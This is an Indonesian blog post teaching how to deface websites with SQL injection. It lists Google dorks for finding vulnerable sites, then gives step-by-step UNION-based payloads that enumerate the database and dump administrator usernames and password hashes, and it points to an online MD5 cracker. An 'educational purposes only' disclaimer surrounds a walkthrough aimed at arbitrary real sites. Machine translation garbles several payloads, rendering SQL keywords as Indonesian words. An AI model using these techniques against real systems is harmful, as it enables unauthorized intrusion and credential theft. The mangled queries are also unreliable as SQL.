Cara deface methode SQL dengan mudah by MR.W4HYU indonesian error system


MR.W4HYU INDONESIAN ERROR SYSTEM -begitu banyak metode peretasan website di kalangan hacker , tetapi metode ini merupakan metode klasik namun sekaligus menjadi andalan para hacker


PERHATIAN !!

1. Posting ini hanya untuk tujuan pendidikan

2. Saya mencoba untuk memberitahu Anda semua bagaimana hacker melakukan semua hal-hal semacam.

3. jangan gunakan artikel ini untuk tujuan ilegal.

4. jika ada yang mendapatkan truble setiap saya tidak bertanggung jawab untuk apa pun.


 **PENGANTAR**

SQL berdiri untuk bahasa query struktural.

SQL injection adalah metode untuk hack website dengan menyuntikkan script sql di dalamnya.

SQL digunakan untuk berkomunikasi ( kenapa nggak di telfon aja ) dengan database website.


 # 1 Menemukan SQL injection situs rentan


GOOGLE dork yang terbaik


inurl:? index.php id =


inurl:? admin.php id =


inurl:? pages.php id =


inurl:? pages.php id =


Selebihnya use your brain ok.

Dan kita mulai.


copy dan paste salah satu script di Google seperti inurl:? id = index.php



#2 Membuka situs web apapun


seperti ==> www.target.com/index.php?id=1




#3 Sekarang Anda harus menambahkan ( ') pada akhir URL



seperti ==> www.target.com/index.php?id=1 '


jika Anda mendapatkan error seperti ### Anda memiliki kesalahan pada MYSQL ###

website ini rentan terhadap injeksi sql.



#4  Sekarang kita harus mencari jumlah kolom



www.target.com/index.php?id=1 order by 10-- (ERROR)


www.target.com/index.php?id=1 order by 9-- (ERROR)


www.target.com/index.php?id=1 order by 8-- (ERROR)


www.target.com/index.php?id=1 order by 7-- (NO ERROR)



jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7



#5 Sekarang kita harus menemukan kolom rentan



serikat www.target.com/index.php?id=1 pilih 1,2,3,4,5,6,7--


jika menunjukkan angka 2 kolom maka rentan adalah 2




#6  kita harus menemukan versi database



www.target.com/index.php?id=1 serikat pilih 1, @@ version, 3,4,5,6,7--


Mengganti kolom rentan dengan "@@ version"


jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya




#7  Sekarang menemukan nama database



serikat www.target.com/index.php?id=1 pilih 1group_concat (schema_name), 3,4,5,6,7 dari information_schema.schemata--




ia akan menampilkan nama data base biarkan nama data base adalah "dunia"




#8 Sekarang menemukan nama semua tabel



union www.target.com/index.php?id=1 pilih 1, concat (table_name), 3,4,5,6,7 dari information_schema.tables mana table_schema = database yang () -



ia akan menampilkan banyak nama tabel kita harus menemukan hanya admin atau pengguna jenis nama tabel

biarkan kita menemukan nama tabel "administrator"

#9 Sekarang kita harus mencari nama kolom
Cth:
union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns mana table_schema = database yang ()

       kita semua melihat banyak tidak ada nama kolom kita hanya harus menemukan user_name dan password
biarkan kita memiliki nama dua kolom user_name dan pass_word.
#10  Sekarang menemukan password dari user_name .
Cth
www.target.com/index.php?id=1 serikat pilih 1, concat (user_name, 0x3a, pass_word), 3,4,5,6,7 dari world.administrator
#ia akan menampilkan username dan password
#ia akan menampilkan password terenkripsi kita harus memiliki untuk mendekripsi
#untuk decryted password saya direkomendasikan digunakan www.md5decypter.co.uk
    Saya kira cukup sekian,Karna saya udah capek ngetik yaa.
Dan saya juga mau tidur
See you nex time


NB :
1. posting ini hanya untuk tujuan pendidikan
2. Aku mencoba untuk informasi bagaimana hacker untuk semua jenis ini hacking.
3. jangan gunakan artical ini untuk tujuan ilegal.
4. jika ada yang mendapatkan truble setiap saya tidak bertanggung jawab untuk apa pun.

Nb:TERUSLAH BERKARYA TANPA MERUSAK

                                     (MR.W4HYU)

Comments

Popular Posts